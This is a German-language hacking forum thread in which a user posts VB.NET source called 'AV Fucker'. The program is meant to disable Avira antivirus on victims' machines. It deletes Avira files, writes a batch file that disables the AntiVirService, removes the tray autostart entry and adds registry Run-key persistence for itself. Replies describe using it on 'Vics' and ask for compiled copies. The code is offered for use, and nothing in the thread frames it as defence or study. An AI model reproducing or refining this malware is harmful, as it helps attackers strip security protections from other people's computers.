[VB.NET] AV Fucker

[inmate]

So habe grade mal was geschrieben.
Es sollte spätestens wenn das Opfer Adminrechte hat nach den Neustart klappen.

Code:

Imports System.IO ' wird für den streamwriter benötigt
Public Class Form1

    Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

        'versucht die .dlls im avira ordner zu löschen
        Try
            IO.File.Delete(Environment.SpecialFolder.Programs & "\avira\antivir desktop\" & "\*.dll*")
            Application.DoEvents()
        Catch ex As Exception

        End Try
        Try
            'Versucht den Ordner Avira zu löschen
            IO.Directory.Delete(Environment.SpecialFolder.Programs & "\avira")
            Application.DoEvents()
        Catch ex As Exception

        End Try
        'erstellt ne cmd im ordner tmp um den Antirservice zu killen klappt aufjedenfall nach dem neustart des systems
        Try
            Dim swriter = New StreamWriter(Environ("tmp") & "\avira.cmd")
            swriter.WriteLine("@echo off")
            swriter.WriteLine("sc.exe config AntiVirService start= disabled")
            swriter.Close()
            'startet die avira.cmd
            Process.Start(Environ("tmp") & "\avira.cm")
        Catch ex As Exception

        End Try
        'macht einen registry eintrag für den autostart der avira.cmd
        Try
            Dim regpfad As String = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
            Dim regname As String = "AVFuck"
            Dim filepfad As String = Environ("tmp") & "\avira.cmd"

            My.Computer.Registry.SetValue(regpfad, regname, filepfad, _
                                          Microsoft.Win32.RegistryValueKind.String)
        Catch ex As Exception
        End Try
        Try
            'Löscht den eintrag für das trayicon von avira
            My.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "avira", "", _
                                          Microsoft.Win32.RegistryValueKind.String)
        Catch ex As Exception

        End Try
        'schreibt einen registry autostart eintrag für die anwendung
        Try
            Dim regpfaddatei As String = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
            Dim regnamedatei As String = "AVFuckstarter"
            Dim filepfaddatei As String = Application.ExecutablePath

            My.Computer.Registry.SetValue(regpfaddatei, regnamedatei, filepfaddatei, _
                                          Microsoft.Win32.RegistryValueKind.String)
        Catch ex As Exception

        End Try
        End
    End Sub
End Class

was der Code macht steht dabei.

mfG

[xPx]

Ah.. thx. Sowas in der art hab ich gesucht

[biggermanbomber]

jo wenn das nun auch noch funzt =) dann DANKE XD

[inmate]

Also bei einem meiner Vics ist AV sofort beendet worden und der service war auch bein neustart immer noch zu.
das trayicon war weg joa.^^

und bei mir bei XP gings auch da war der servive jedoch erst nach dem neustart vollständig beenden wie das trayicon.

mfG

[Kaspersky]

So wie ich das sehe geht das aber auch nur wenn man avira im standart ordner installiert hat.

[inmate]

Nein es geht auch in anderen Ordner da die avira.cmd eigentlich nur entscheident ist

Das löschen würde nicht gehen aber Avira ist trotzdem down.

mfG

[rage491]

Kann das mal bitte einer compilieren udn uppen?

[sarex]

also ich find das teil geil!
funkzt auch unter vista wie ich es mir erhofft habe (durch´s lesen^^)
mfg

----------
edit :
nur das mit der registry kann ich bemängeln in vista =)
edit ende
---------

[Wallenstein]

Compilieren &nd Uppen pls :[

Ich arbeite mit VB6 :p

Und hab auch nach sowas gesucht

[inmate]

@yazzn

1.ist es vb.net
2. der code steht da warum sollte ich es compilen und uppen ?
3.wenn du in vb6 codest dann wird dir der compilte code nichts bringen , wenn du daraus lernen willst ist der opensource besser.


mfG